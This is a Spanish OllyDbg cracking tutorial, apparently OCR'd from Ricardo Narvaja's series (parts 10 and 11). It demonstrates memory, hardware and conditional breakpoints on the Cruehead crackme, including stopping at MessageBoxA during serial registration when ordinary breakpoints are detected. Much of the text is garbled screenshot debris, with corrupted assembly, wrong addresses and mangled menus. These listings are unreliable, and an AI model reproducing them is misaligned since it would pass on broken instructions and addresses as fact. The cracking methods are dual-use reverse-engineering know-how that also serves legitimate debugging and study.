Bueno demos RUN y para en 401007 donde el programa trata de escribir en nuestra zona del BPM o sea 
en 4020CA. 


ll mL ax +01) +) 1/elmMt[wu/c),]x/8]r]- Js] 5/9] 


PUSH O 


dleA> 


CRACKME. 004000099 


E J |PUSH CRACKME. 004020F4 ASCII "No need to disasm the code?” 
3 17] CALL _<JMP. 2USERS2.F indllindowA> 


Si vemos el motivo por cual paro, abajo en OLLYDBG nos dice 


NN ++ A 
| Memory breakpoint when writing to [00402004] 


Esta por escribir el valor que esta en EAX al contenido de 4020CA, lo cual provoca que OLLYDBG pare, 
si recuerdan cuando tratábamos de escribir en la memoria y esta no tenia permiso de escritura, se 
generaba una excepción, pues eso es lo que básicamente hace OLLYDBG, al colocar un BPM ON 
ACCESS le quita el permiso de lectura y de escritura a esa zona, y al tratar de escribir o leer de allí, 
genera una excepción que detiene el programa, ya lo veremos mas claramente cuando veamos el capitulo 
de excepciones, pero es bueno que tengan una idea. 


Si apreto F7 ahora si guardara el valor ya que el mecanismo del OLLY es sofisticado y permite que una 
vez detenido, si se pueda escribir al apretar f7. 


Allí esta guardo 400000 si doy RUN nuevamente como el BPM esta aun activo, parara si el programa 
vuelve a escribir o intenta leer este valor. 


[e] File View Debug Plugins Options Window Help 


al] > LjejmitiwjH[c 
PUSH B 


CALL <JMP. $ KERNELS2. GetModu leHandleA> 
MOU DWORD PTR DS: [4020CA7,EAX 

PUSH B 

PUSH CRACKME. B04620F4 

CALL <JMP. ¿USERS2. FindWindowA> 

OR EAX, ERX 


D 
má 


Mo: 


TP 


201 MOU DWORD PTR DS: [402064], 4003 

104 MOV DWORD PTR DS: [402068], CRACKNME. ln dPyr: 

104 MOV DWORD PTR DS: [482080 J,8 
24 MOU DWORD PTR DS:[402070], 


ta] nan an 


l 

Cc 

C? 

Al MOU EAX, DWORD PTR DS: LGZÓCAJ 

AS MOU DWORD PTR DS:[402074],EAX 

6A PUSH 64 Ss 
3] PUSH EAX (ni 
ES CALL <JMP.2USER32.LoadIconA> Le 


Vemos que ahora para allí, al tratar de leer de 4020CA en este caso nos dice MEMORY BREAKPOINT 
ON READING ya que paro al leer de allí. 


| Memory O when reading [OD4020C4] 


Si apreto F7 lee el valor guardado y lo pasa a EAX 


ASCII "MEP 


[mes 


6D ntdll.7C92 

738 ntdll.7C92 

CRACKME. 68 

CO BLFF 

P 1 OFF 

AD OFF 

2 1 OLFF 

s0 ?FFD 
= 


Ds 


Apreto F9 a ver si alguna vez mas para. 


PUSH _CRACKME. 60402064 


PUSH a 
PUSH DWORD PTR DS: [4820CA] 
PUSH A 


] 


PUSH 3008 


DIC Orarara 


. 
POR Mao 


Nuevamente para ON READING ya que lee el valor que hay en 4020CA y lo manda al stack con PUSH. 


Memory A when reading [OD4020C4] 


Ahora si quiero quitar el BPM que coloque hago click derecho en el DUMP y elijo BREAKPOINT- 
REMOVE MEMORY BREAKPOINT y con eso se quita, lo mismo como ya dijimos si colocamos uno 
nuevo. 


(rus Binary po [a pue 
ana Label LoadCursorA 
Breakpoint Memory, on access El 
Search for Memory, on write 


Find references CtrHhRr Remove memory breakpoint 
View executable file 
Copy to executable file 


Hardware, on access » 


Uorduwara nn writa » 


En el caso anterior si al colocar el BREAKPOINT, hubiéramos elegido que sea ON WRITE o sea en 
escritura, OLLYDBG parara solo cuando escriba en la zona del BPM y no cuando lee. 


Otra opción que nos da OLLYDBG es colocar un BPM en una sección completa. 


Para ellos vamos a VIEW-MEMORY o a la ventana M que es lo mismo. 


3 Window  Hel 


NEL32. GetModu leHañd 
DS: [4920CA],EAX 


Allí vemos las secciones del crackme y mas abajo las secciones de las dlls y diferentes secciones 
utilizadas, podemos marcar la que deseemos por ejemplo, la sección que comienza en 401000 allí la 
vemos. 


MDevicerHarddiskVolume1xu 


200001000 data mag |R 1 
00001000/| CRACKME |. idata imports Imag|R RWE 
00001000| CRACKME | .edata exports Imag|R RWE 
.reloco relocations! Imag|R RWE 
CRACKME | .rsro resources Imag|R RWE 
Map [RE RE 
Map [RE RE 

Map |R R 

Map [RE RE 

AMADO: Ca Dia ica! Did Dit 


Hago click derecho en dicha sección y elijo SET MEMORY BREAKPOINT ON ACCESS. 


VUSLUVVO| VUVUZOVO 

DO3E0000| DOBB2000 | 

00400000| 00001000| CRACKME PE header 

90401000/ 00001000: CRACKME | CODE y 

00402000 | 00091000| CRACKME | DATA Actualize 

des sele SE LIN View in Dias Ente 
«edatl 

a AS 
«PSC Ñ 

90419000| aaBasaoa Dump in CPU 

00400000 | 00BB2000 


rap ¡rn 
Map |R 
Imag|R 


be | 


dos Seas de 
O0SF0000| 00010000 Search Ccri+B 


S8C30000| 00001005 | COMCTL32 
58031000 | 00070000 | COMCTL32|. text 

58CA1000| 09003908 | COMCTL32| .dat¿ Set break-on-access F2 
S8CA4000| 0001F606| COMCTL32|. 

S£8CC3000| 00004006 | COMCTL32|. 


76360000 | 00091090| COMDLG32 S Y an) 
o lo eme bre ont 
76395008 anal 2000 | COMDLGS2| repre “et Memory breakpaint on write 


720700! ARARACRARA! PAMAIA2R2) role 


Vemos que justo debajo tenemos la posibilidad de colocar también un BPM ON WRITE pero en este caso 
lo haremos ON ACCESS doy RUN. 


5h 60 
ES FFO40090 |CALL <JMP.SKERNEL32. GetModu leHandleA> 
+ o MOU DWORD PTR DS: [40260C0A7,EAX 


PUSH A 
68 F4204000 | PUSH CRACKME. B004020F4 ASCII "No need to disasm the codet” 
O CALL <JMP. 2USERS2. FindWindowA> 


DO 


OR EAX, EAX 


Da mi 


Vemos que para en la siguiente línea veamos porque 


| Memory 5 when executing [00401002] 


Claro paro ON EXECUTION o sea el ejecutar, ya que pusimos el BPM en la sección que se ejecuta, pues 
al tratar de ejecutar alguna instrucción en dicha sección, para en este caso ON EXECUTION. 

77FAEGOB| 6 | SHCWAPI í resources 

77FB9008 


?CS8anon 00073000 ke erne [32 

7CSFE000| BOBBEBBA| kernel32| .reloc 

70310009 | 009091099/ntdll 

7C911009| 00976090/ ntdl l «text code, export; Imag 


Ahora cambiaremos el BPM a la sección de KERNEL32 que esta a continuación del header, en mi caso 
es esta. 


77ES0000| 60001900| RPCRT4 | 
77ES1000|00082000|RPCRT4 | .text 
77ED3009| 90997900 |RPCRT4 | .orpo 


>?EDAODO| 00001000 RPCRT4 |.data 

?7EDEG00 | 00001000|RPCRT4 | orsre Set mernory breakpoint on write de 
>?EDCo00|o0005000| RPCRTA | .reloc 

>?EFO000| 00001008 GDIS2 Remove memory breakpoint 
>?EF1000|00042000 GDI32  |.tent 

>?F33000| 00001000 GDI32  |.data Set access 


77F34000| 000010090| GDI32 «PSrc 
77F35000' 00082000' GDIS2 «reloc 


77F40000 | 00001006/ SHLWAPI j 
77F41000| 0006C000| SHLWAPI | .text Copy to c | ipboard 
77FADOGO| 000B1006| SHLWAPI | data Sort b 

77FREGOO| 0B0B2000| SHLWAPI | .rsro y 


77FEBO0O| 00BB600B| SHLWAPI | .reloc 


7C800000| 00001000 kerne 132 Appearance 

7C3015000) 60082000 kernel32 .tent 

7C883000| 0060605990 | kerne132| .data data Imag|R RWE 
7C3838000| 00073000 | kernel32| .rsrc resources Imag |R RWE 
PORERARA! ARARARARA | kerne122! velar: relncatinnsa! Tmaa!R RuUIF 


Le coloco un BPM ON ACCESS allí, así que parara cuando lea, escriba allí o cuando ejecute alguna 
instrucción en esa sección de KERNEL232, jeje doy RUN. 


> lbs 

3BF| MOV EDI,EI ntdll.7C920738 
PUSH_EBP 

£BEC MOU EBP,ESP 

ld BB CMP_ DWORD PTR SS: [EBP+8],0 

PUSH DWORD PTR_SS: [EBP+8] 

TEST EAX,EAX 

PUSH DWORD PTR DS: [EAX+4] 

POP EBP 

C2 6400 

64:A1_13000000| MOU EAX, DWORD PTR FS: [18] 

88450 30 


MOU EAX, DWORD PTR DS: [EAX+307 
MOU EAX, DWORD PTR_ DS: [EAX+8] 


FF7rS 08 

Es 638200000 
85ca 

74 08 

FF7O B4 

ES F4300000 


t leA 
pModule = MULL 
RETURN_to kernel32.7C816D4F 
Intdll.7C9 3 


| 
[ES 


( 


End of SEH chain 
E ha 


DO: 


e 


CRACKME. <Modu leEntryPoint > 


En este caso para al ejecutar una instrucción de la kernel32.dll y me funciono para saber cual es la primer 
api accedida desde el programa en dicha dll, si vemos la dirección de retorno en la primera línea del stack. 


t 
—* Edu : 
ETURN 
? 33|ntdl1l.7? 
FFFFFFFF 
?FFDFODO 


E of SEH chain 


Pa 


Si vemos adonde retornara con click derecho- FOLLOW IN DISASSEMBLER 


97) p CAL! , 
; 2 Cero | Address » 
- ¿e nedllel Show ASCII dump 
Show UNICODE dump 
8 Lock stack 
End of 
SE han: 
ze kernel; Copy to clipboard Ctri+C 
ae 00 | Modify 
erre eacaaas| a Edit CtrkE 
Push DWORD 
Pop DWORD 


Search for address 
Search for binary string CtrHB 


Go to EBP 
Go to expression CtrG 


Follow in Disassembler Enter 
Y Follow in Dump 


CALL <JMP. *KERNEL32. GetModu leHandleA> 
a PTR DS: [4020CA],ERXx 


AS 

5A un 

68 F4204000 | PUSH CRACKME. 604B20F4 

Es A60466006 |CALL <JMP.USERS2.FindWindowA> 


ASCII "Na 


Veo que un poco mas abajo hay una llamada a FindWindowA pero esa no parara pues corresponde a otra 
dll, en este caso a User32.dll. 

Si doy run nuevamente parara en la siguiente línea de la api ya que el BREAKPOINT ON ACCESS me 
hace parar en cada línea de la misma que se esta ejecutando, pues entonces lo quitare con REMOVE 
MEMORY BREAKPOINT como antes. 


Si quiero volver al programa, hago click derecho EXECUTE TILL USER CODE, o si no funciona en 
algún caso, puedo usar allí mismo EXECUTE TILL RETURN lo que me lleva hasta el RET y luego 
apreto F7 y vuelvo al programa. 


[c] File View | Debug | Plugins Options Window  Hel| 


344 X| PP run FO 


Restart CtrF2 

Close AÍHE2 

Step into F7 

Step over Fe 

Animate into CtrF? 

Animate over Ctri+Fe 
al 38 Execute till return CtrrHF9 
c 2 Execute till user code ES 
] ser Open or clear run trace 


En este caso EXECUTE TILL USER CODE funciona perfectamente ya veremos en que casos no 
funciona. 


gg Pe YI DEDUG FI Io PLD. > WU A nep 


EXE EEES PI 


217] PUS 
Es FF640008 |CALL _<JMP. +KERNEL32. GetModu leHandleA> 
en o MOV DWORD PTR DS: [4826CA],EAX CRACKME. 60400990 


PUSH B 

68 F4204000 | PUSH CRACKME. 004020F4 ASCII "No need to disasm the codet” 
Es A6649006B |CALL <JMP. USERS2.FindllindowA> 

BECA OR EAX, EAX 


Si pongo un BPM de nuevo en la kernel32.dll parara en la siguiente api que se ejecute de esa dll y asi. 


También si no puedo colocar porque es detectado un BP MessageBoxA porque el programa detecta el CC 
como vimos antes podemos poner un BPM allí también y cumplirá la misma función, veamos el ejemplo 


65 20 63 6F/|64 65 21 GB|e codet. 


Command ? MessageBoxA y] HEX: 77D504EA- DEC: 2010449130 - ASCII: wÓné 


En mi maquina es 77D504EA así que voy allí en el listado con GOTO EXPRESIÓN, puedo tipear la 
dirección o el nombre siempre respetando mayúsculas y minúsculas. 


MessageB oxó, 


EDI 


Ex) et] visi $30) +1] > 


55 
£BEC MOU EBP,ESP 
9390 ECOÁNZZZ CMP_ DWORD PTR DS: [77D704E6C1,0 
64:A1 180000909 AO PEU PTR Fs: [18] 
PUSH DWORD _PTR DS: [EAX+24] 
PUSH USER32.77D70B24 
kerne 132 
TEST_EAX, ERX 
MOU DWORD PTR DS: [77D70B201,1 
PUSH O 
HE DWORD PTR SS: CEBP+14] 
FF7S 68 
Es 20000000 
POP EBP 
C2 1000 RETN 10 
90 NOP 
90 NOP 
hod espese Backup » 
227 1CMP DWORD PTF Copy » 
0000| MOV EAX, DWOR! ] 
PUSH 8 Binary » 
2__ [USA lisens2.7  Assembl s 
177 E pi pace erlockedCompareExchange 
TEST EAX,EAX| — Label 
La Li Comment ; 
cs as FIT Tee 2 
PUSH DWORD P' | a E 
o [BUS DuORD PT Run trace » | Conditional ShifteF2 
Por Eb RAS | Conditional lo ShifteF4 
a New origin here CtritGray * 9 
NOP | Run to selection F4 
NoP Go to di 
NoP Follow in Dump di 
ON | Memory, on write 
HOU EBP.ESP Search for | á 


Y veo que también tengo la posibilidad de elegir poner un BPM ON ACCESS o ON WRITE, elijo la 
primera opción y doy RUN. 


CrackMe v1.0. E Jalx) 


File Help 


Voy a HELP —REGISTER y allí pongo un user y serial cualquiera 


Register 


Name Inarvaja 
Serial [osoeoe| ] 


OK | Cancel | 


Al apretar OK 
8BFF MOU EDI,EDI 

7YD5B4EC| 55 PUSH_EBP 

77D504ED| SBEC MOU EBP,ESP 
8330 BCO4D777 (CMP_DWORD PTR_DS:L77D704BCJ,0 
64:A1 12000000| MOU EAX, DWORD PTR FS: [18] 
6490 PUSH B 
FF7O 24 PUSH DWORD _PTR_DS: [EAX+24] 


68 240BD777 _ [PUSH USER32.77D70B24 
FF1S CS12D177 | CALL DWORD PTR-DS: C<8KERNELS2. Interlocki kerne 132. Interl 
8500 TEST_EAX, EAX 


vw 75 GA 
Cros 20080777? (MOU DWORD PTR DS: [77D76B207,1 
£5A_ 06 PUSH O 
FF7S 14 PUSH DWORD PTR SS: [EBP+14] 
FF7S 10 PUSH DWORD PTR SS: [EBP+10] 
FF7S ac PUSH DWORD PTR SS: [EBP+CI 
FF7S 08 PUSH DWORD _PTR SS: [EBP+8] 
Es 20000000 
5D POP EBP 
Cc2 1000 
E 90 NOP 
FINCA DA ara Hno 


Para en la misma forma en la api que si hubiéramos puesto un BP allí y si los BP son detectados es otro 
metodo para parar alli, que aunque puede ser detectado por el programa, mirando el permiso de la zona si 
cambio, igual es menos probable que ello ocurra, al menos es otra alternativa y hay que conocerlas todas. 


Bueno para la parte siguiente nos quedan los HARDWARE BREAKPOINT y los MESSAGE 
BREAKPOINTS y el caso de los BPPX CONDICIONALES que requiere más explicación, creo que por 
ahora tienen para practicar. 


Hasta la parte 11 
Ricardo Narvaja 
26 de noviembre de 2005 


INTRODUCCIÓN AL CRACKING CON OLLYDBG PARTE 11 


Bueno, ya nos queda ver los hardware breakpoints, los condicionales y los message breakpoints, para 
terminar con los tipos de breakpoints. 


HARDWARE BREAKPOINTS 


Los HARDWARE BREAKPOINTS o (HBP) son una propiedad física del procesador, realmente yo no 
conozco la arquitectura de los mismos para explicarla, pero es como si tuviera varias entradas en las 
cuales vos le podes poner las direcciones en las cuales querés que el programa se detenga y el al ir 
ejecutando compara y al hallar la dirección parara. 


Tenemos la posibilidad de poner cuatro HBP, a la vez al poner el quinto OLLYDBG nos pedirá que 
elijamos cual de los 4 existentes queremos borrar. 


Como siempre usemos el CRACKME DE CRUEHEAD para practicar 


[c] File View Debug Plugins Options Window Help 


£A BB PUSH Bl 

ES FFO40008 [CALL <.JMP. ¿KERNEL32. GetModu leHandleA> 
AS Ca2a4908 [MOU DWORD PTR DS: [4020CA7,ERX 

6A Bu PUSH A 


63 F4204000 [PUSH CRACKME. 004B820F4 ASCII "No need to disasm the codet” 
Es A6B40608 [CALL _<JMP. USERS2.FindllindowA> 
BECO OR EAX, EAX 


MOU DWORD PTR DS:[492064],4003 
MOU DWORD PTR DS: [492068], CRACKME. lndP: 
MOU DWORD PTR DS:[49206C1,8 

MOU DWORD PTR DS:[4920701,0 

MOY EAX.DUORD PTR_DS: L4020CA] 


Existen HBP ON EXECUTION, ON WRITE y ON ACCESS son las tres posibilidades existentes. 


Poner un HB ON EXECUTION cumple la misma función que poner un BPX en una dirección, salvo que 
el HBP no cambia código y es mas difícil que sea detectado, eso si hay programas que tienen trucos que 
nos borran los HBP, esos trucos y la forma de contrarrestarlos los veremos en próximas entregas. 


Si quiero poner un HBP EXECUTION en 401013, marco la línea, hago click derecho y elijo 
BREAKPOINT-HARDWARE ON EXECUTION 


J ASCII "No need to disasm the code 


PUSH CRACKME. 004920F4 
A A 


63 
ES heñdodós 0 ra 
> 24 Backup id 
C70s mo Copy > 
Cros ESsosaal na , 
C705 ma Binary > 
cres 70204001 Ma 
Al cazo4909 MO  Assemble Space 
E E | par Le 
ES D1030000 |CA ; LoadiconA 
0 2E5eS0SS | re 
£A 06 ET] Breakpoint » Toggle F2 
ES A2030008 ; da : 
AS LOZO4aOa Mo Hit trace »' Conditional Shift+F 
Ec0S ¿2049 MO Runtrace » | Conditional log Shifter 
és 64204008 |PU i 
Eo Eescosós ch Follow Enter Run to selection F4 
ES A2a4oal EA New origin here CtrGray * Memory, on access 
5A a Pu ; 
68 basooasa [PU Goto » Memory, on write 
63 0BSBBBBB |PU . 
6A SE PU Follow in Dump 
és E4oooB00 |PU 
68 BBBBCFOD |PU 
3040101 63 E7204009 |PU 


94910 - Search for 
JOAO I4BE=< IMP. LUSERSE.F indi yo 


También puedo tipear en la commandbar 


Command HE 401013 y] 


Con lo cual el HBP estará puesto. 


OLLYDBG tiene una ventana especial para que podamos ver y manejar los HBP, para ello vamos a 
DEBUG-HARDWARE BREAKPOINTS 


[e] File View ¡aa Plugins Options Window Help 


Run Fo 
Restart CtriF2 
Close AlMF2 
Step into F7 
Step over Fe 
Animate into CtrkE7 
Animate over CtrkFs 
Execute till return Ctr+F9 


Execute till user code AlHF9 


Open or clear run trace 


Trace into CtrF11 
Trace over CtrF12 
Set condition Ctrl+T 


Hardware breakpoints IS 


Inspect 
Hardware breakpoints [X] 
H Base Size Stop on 


1 [00401013 [ — fErecute [ Folowt] Delete1 | 
TIO ton2f bebes] 
E TAO talon] pete | 

oK | 


ro 


a) 


no 


Allí tenemos la ventana de los HBP, si apretamos FOLLOW nos mostrara en el listado donde esta 
colocado el mismo, y con DELETE podremos borrarlo. 


Ahora apreto F9 para correr el programa 


ma Y mor ind] A Rp Y A op 


ajdx] 1 SALMA PUES 5 0 0 0 0 0 0 0 0 A E 


a] PUSH 
ÉS PFO40000 CALL <anP. S£¿KERNEL32. GetModu leHandleA> 
AS MOU DWORD PTR DS: [4620CA],EAX 


PUSH U 
PUSH CRACKME. B004020F4 ASCII "No need to disasm the codet” 
CN IE FindWindowA> 


DU DWORD PTR DS: [402064], 4003 
OU DWORD PTR DS: [402068], CRACKME. lWndPy: 


Y para en 401013 


Como vemos se comporta como un BPX común, si realizamos la misma prueba que hicimos con el BPX 
de escribir MOV EAX, DWORD PTR DS:[401013] y lo ejecutamos vemos que el código no ha sido 
cambiado. 


NOP 

MOV DWORD PTR DS: [4026CA7,EAX 

PUSH O 

PUSH CRACKME. B004020F4 ASCII 


63 F4204000 
a CALL <JMP. ¿USERS2. FindWindowA> 


OR EAX, EAX 
74 01 JE_SHORT CRACKNME. 00491810 


al 


ES TEBSS nt 
FFOBOBB 


ESP BB12FFEC 
EBP 0012FFFO 
ESI FEFFFEFF 


EDI 7C920738 ntdl 
EIP 00481095 CRACI 


DOG 
Y pa 


Vemos que los bytes son E8 A6 04 00, los lee al revés y nos muestra 00004A6E8, sin cambios, así que 


verificamos que no hay cambios de código. 


A su vez podemos reiniciar el OLLYDBG veremos que el HBP se mantiene colocado 


Hardware breakpoints X 


H Base Size  Stopon 


[coo [— fésecae: [Falo] 
2 PAJA ton] 
E al 
A a | 


Delete 1 


UUqUZ1MS|6> 24 63 6r[69 bb Zl Muje code?. 
Command HE MessageBoxa] y] TE 


Ahora lo vemos en la lista de HBP 


Hardware breakpoints 
H Base Size  Stopon 


[POSMEA [7 [Eneas [Falon1] me. 
1 

jus [E 

a E 


n— 
n— 


No repetiremos lo mismo pero sabemos que si corremos el programa y le colocamos un user y pass, y lo 
aceptamos, parara en la api MessageBoxA de la misma forma que lo hemos hecho antes con BPX 


comunes. 


Los HBP ON ACCESS y ON WRITE solo pueden abarcar 1, 2 o 4 bytes de largo, por mas que 
marquemos zonas en el dump mas largas, solo tomara como máximo los primeros 4 bytes de la misma 


veamos el ejemplo. 


Reinicio y borro todos los HBP que quedaron, y tratare de colocar un HBP ON ACCESS en la dirección 
4020CA 


Voy a ver dicha dirección en el DUMP 


Enter expression to follow in ... [X] 


Cancel | 


De 


ran 2,1 mt 


Y hago click derecho 


AAA A A nn 
Backup 
Copy 
Binary 
Label : ENE 

Memory, on access 

Search for »| Memory, on write 


Find references Ctrr SRA í —1| 
View executable file [here Entes BE 
Hardware, on write Wor 


Copy to table fil 
AG Hardware, on execution 
Go to 3 


DRAWDRASADORAANDANONNNOO 
DIAASODANANS TAS AANDOSDO NDA 
DSANOADOWRNJANIDADAMONOSOO 
DONADAS AAAMOOO 


SAOADOMAA AIR ANAMO> ANDA DAA 
DINYADALAAN ADAL RSALONOS 


Veo que haya marcado la zona que haya marcado, me aparece solo en este caso la opción de colocarlo en 
un solo byte a partir de 4020CA o dos bytes (WORD), la opción de 4 bytes va de cuatro en cuatro así que 
si uno de casualidad elije una dirección intermedia no aparecerá, como en este caso, 


Vemos que si hago click derecho en el byte siguiente y elijo HARDWARE ON ACCESS, solo aparece la 
opción BYTE 


nt 
Search for » 
Find references CtrHR 
View executable file 


Corn ta aumncitalala fila 


Memory, on access 
Memory, on write 


Hardware, on write 


Y en el siguiente ya me aparece nuevamente la opción DWORD o sea que abarque cuatro bytes. 


Backup 
Copy » 
Binary 


Memory, on access 
Search for »| Memory, on write 
Find references CtrHRr 
View executable file 

Copy to executable file 

Go to > 


Hardware, on 
Hardware, on write 
Hardware, on execution 


El tema es que si yo quiero que pare cuando guarda o lee en 4020CA, con que haya un HBP en un solo 
byte es suficiente pues al intentar guardar o leer en la dirección parara igual. 


Vuelvo a 4020CA y coloco un HBP ON ACCESS- BYTE 


Binary 
Memory, on access 
Search for »| Memory, on write 
Find references CtriR | 


Wiew executable file > 
ARAP1S Hardware, on write 


Hardware, on acce: 


Base Size  Stopon 


1 fGoa020cA [1 [Access Delete 1 | 
2 JJ Folw2 | _Detete2| 
AJA JAS Foowa ) 
e ona eres 


[18] 


Follow 4 


q 


Doy RUN 


[c] File View Debug Plugins Options Window Help 


alex] ja] ESE] ESPE al +] 1/ejmrjwjn[c]4[k] 


1 6A Ba 
1 Es FFO40000 [CALL <JMP. KERNEL andleA> 
1 AS Ca2040006 [MOV DWORD PTR DS: 

1 5A Bu PUSH 

a 68 F4204000 |PUSH CRACKNME. 6004020F4 ASCII "No 1 
1 

1 

1 


Es A6046606 | CALL <JMP.¿USERS2.FindWindowA> 
BBCO OR EAX, ERX 


74 al 
Cc3 


A 


Gurirriary ME Mco dayrDuU w ] po LUNA 


| Hardware breakpoint 1 at CRACKME.0040100C - ElP points to next instruction 


Allí nos dice OLLY que paro por el HBP 1 o sea el primero de la lista de los HBP. 


Hardware breakpoints 


H Base Size  Stopon 


(Aipplczaca [1 [access Delete 1 


Veo que para en la línea siguiente a donde guarda o lee, eso ocurre con los HBP ON ACCESS y ON 
WRITE siempre debemos recordar que se pasan una instrucción y paran en la instrucción siguiente. 


Y para justo después de guardar, a diferencia del MEMORY BREAKPOINT que hubiera parado en 
401007, justo en la instrucción que lo activa. 


Bueno lo mismo se puede realizar con los HBP ON WRITE, en ese caso solo parara cuando guarda no 
cuando lea, y en la instrucción siguiente a la que lo activa. 


BREAKPOINT CONDICIONALES 
Son en realidad una variante de los BPX comunes, solo que al activarse OLLYDBG chequera si alguna 
condición que le colocamos se cumple y en ese caso parara, si no se cumple seguirá corriendo como si no 


existiera. 


Veamos un ejemplo 


om gr =p e 


ES FFO40000 CALL <JMP. ¿KERNEL32. GetModu leHand leA> 
3 ES MOU DWORD PTR DS: [4020CA],EAX 


PUSH BM 

68 F4204000 | PUSH CRACKME. 004020F4 ASCII "No need to disasm the codet” 
Es A6640BBB |CALL <JMP. USERS2.FindWindowA> 

. 228, OR EAX, EAX 


3 
> C7O5 642043 MOU DWORD PTR DS: [402064], 4003 


Reiniciamos el OLLY y borramos todos los HBP si quedo alguno del ejemplo anterior y colocare un BPX 
CONDICIONAL o BREAKPOINT CONDICIONAL en 40100E, para ello marco la línea, hago click 
derecho y elijo BREAKPOINT CONDICIONAL. 


a RES 
sn 68 PUSH 8 | 
40100E 68 F4204000 |PUSH CRACKME. BRARSREA NSPTT "Na noed to disasm the codet” 
00401013 ES R6B4B0B0 |CALL <JMP.2USER — pack » 
oa4010138||. 6BCa OR EAX, EAX acKup 


064B101A|] .v 74 01 
1C[]. C3 Copy > 

> C705 MOU DWORD PTR [ , 

. C705 c Binary » 

: Efes Pasesun E bl S 

: AL Casegada [MOV ERR DWORD E “cmble pace 
AS 74204009 C Label , 
6A 64 PUSH 64 a. 


Comment 


El] 
ES D1030008 

AS MOU DWORD PTR [ 

es Ba7FaGun |PusH 7FO0 t 4 Toggle 


sA 90 
Es Azo39000 | CALL <UMP-2USEF — Hit trace > 
AS £ceadaaa, | MOY DWORD ETR l 
» ma 
C705 cizosaal M Run trace Conditional log 
68 


Run to selection 


PUSH_CRACKME. BE Ras nrinin hara Pila raw * 


Me sale la ventanita para que escriba la condición 


Add condition at CRACKME.0O... (X| 


Cancel | 


Pondré que pare si EAX vale 400000, o sea la condición será EAX==400000 


Add condition at CRACKME.OO...[X 


[EA%==400000 al 
Cancel __| 


En la ayuda del OLLYDBG nos muestra los símbolos que podemos utilizar, en este caso el igual, se 
representa por dos símbolos igual consecutivos. 


MARA Aa $5 5 PS) 250 HON MES HO O SOS IS ES O IS IS ID US AS 


6A Ba PUSH B 
ES FFO406008 [CALL _<JMP.KERNELS2. GetModu leHandleA> 
AS CA204000 


a e MOU DWORD PTR DS: [4620CA],ERX 

68 F4204000 | PUSH CRACKME. 064020F4 ASCII "No need to disasm the codet” 
Es A6040660 | CALL _<JMP. ¿USERS2.FindlindowA> 

BECO OR EAX,EAX 


== 88] 4] 


Vemos que en el caso de un BPX CONDICIONAL se cambia a color rosado, apreto F9 


[c] File View Debug Plugins Options Window Help 


EXEC ESPERES SE BEA 


6h Ub 

Es FFO4000B CALL Comp. £KERNEL32. GetModu leHandleA> 
A3 CA204000 |MOU DWORD PTR DS: [4020CA7,EAX 
sA 66 PUSH O 

68 F4204000 PUSH CRACKME. 004920F4 

Es A6046006 |CALL <JMP.2USERS2.FindWindowA> 
BECO OR EAX, EAX 


ASCII "No need to disasm the codet” 


Vemos que paro y OLLYDBG nos dice 


El 


Command la 


| Conditional breakpoint at CR4CKME .0040100E 


Si vemos EAX vemos que vale 400000, lo cual fue la condición para que se detuviese 


A: 00400000 


¿ ?ESTEBSS mtdl 
7FFDEGOO 


ETT > 


' BB12FFCO 

' BB12FFFO 

FFFFFFFF 
7C920738 ntdl 
0040100E CRAC 
ES 0623 32bi 


Si reinicio y borro el BPX CONDICIONAL y ahora coloco otro pero que pare si EAX==500000 por 
ejemplo 


[Ex ==$500000 = 
Cancel | 


Y doy RUN 


Vemos que el crackme se ejecuta y no para en el BREAKPOINT ya que siempre al pasar por allí, vale 
EA X=400000 y la condición no es cumplida, por lo tanto no se detiene. 


Si vamos a HELP-CONTENTS 


Y - mam read, modu 


pa Help | 
ME About 
— 
ietMod 


'8CAJ, 
Select API help file 


elt 


dilind 
1101D 


a 
AK oltyDbo v1.10 


Official stuff 
Legal part 
Your privacy and security 


Registration 
No) support 


Before you start 


System requirements 
Installation 


Components 
General principles 
Disassembler 
Assembler 
Analyzer 
Object scanner 
Implib scanner 


How to use OllyDbg 
How to start de 
CPU window 
BreakpointS 


ing session 


Modules 


Allí a BREAKPOINTS y luego a expression 


Breakpoints 
OllyDbg supports several kinds of breakpoints: 


- Ordinary breakpoint, where the first byte ofthe cormmand you want to break on is replaced by a special command INT3 (Ti 
Debugger). You place this breakpoint by selecting the cormmand in Disassembler and pressing F2, or over pop-up menu. Whe 
F2 for the second time, breakpoint will be removed. Notice that program stops before command with breakpoint is executed. 
The number of INT3 breakpoints you may set is unlimited. When you close debugged program or Debugger, OllyDbg automati 
breakpoints to disk. Never try to set this breakpoint on data or in the middle ofthe command! OllyDbg warns you if you attemp 
breakpoint outside the code section. You can permanently turn offthis warning in Security options. ln some cases Debugger t 
owen temporary INT3 breakpoints. 


- Conditional breakpoint (shortcut Shift+F2) is an ordinary INT3 breakpoint with associate 
this breakpoint, it estimates expression and, if result is non-zero or expression is invalid, stops=telreeeefhrogram. Of course, 
caused by false conditional breakpoint is very high (mostly due to latencies ofthe oper, al system). On PII450 under Winc 
OllyDbg processes up to 2500 false conditional breakpoints per second. An impo case of conditional breakpoint is break 

message (like WM_PAINT). For this purpose you can use pseudovariable MS gether with proper interpretation of argurneni 


OLLYDBG nos mostrara ejemplos de expresiones que pueden ser usadas en las condiciones 


Evaluation of expressions 


OllyDbg supports very complex expressions. Formal grammar of expressions is described at the end ofthis topic, but hone 
not interested in it, are you? So Ml begin with examples: 


10 - constant 0x10 (unsigned). All integer constants are assumed hexadecimal unless followed by a decimal point; 
10. - decimal constant 10 (signed); 

'A' - character constant 0x41; 

EAX - contents of register EAX, interpreted as unsigned number, 

EAX. - contents of register EAX, interpreted as signed number; 

[123456] - contents of unsigned doubleword at address 123456. By default, OllyDbg assumes doubleword operands; 
DWORD PTR [123456] - same as above. Keyword PTR is optional; 


[SIGNED BYTE 123456] - contents of signed byte at address 123456. OllyDbg allows both MASM- and IDEAL-like ren 
expressions; 1 


STRING [123456] - ASCII zero-terminated string that begins at address 123456. Square brackets are necessary becaL 
the contents of memory; 


[1123456] - doubleword at address that is stored in doubleword at address 123456; 
2+3%4 - evaluates to 14. OllyDbg assigns standard € priorities to arithrnetical operations; 
(2+3)'4 - evaluates to 20. Use parentheses to change the order of operations; 


EAX.<0. - DifEAX is in range 0..O0x7FFFFFFF and 1 otherwise. Notice that constant D is also signed. When comparin: 
unsigned, OllyDbg always converts signed operand to unsigned. 


EAX<O - always D (false), because unsigned numbers are always positive. 


MSG==111 - true if message is WM_COMMAND. 0x0111 is the code for WM_COMMAND, Use of MSG makes sense 
conditional or conditional logging breakpoint set on call to or entry of known function that processes messages. 


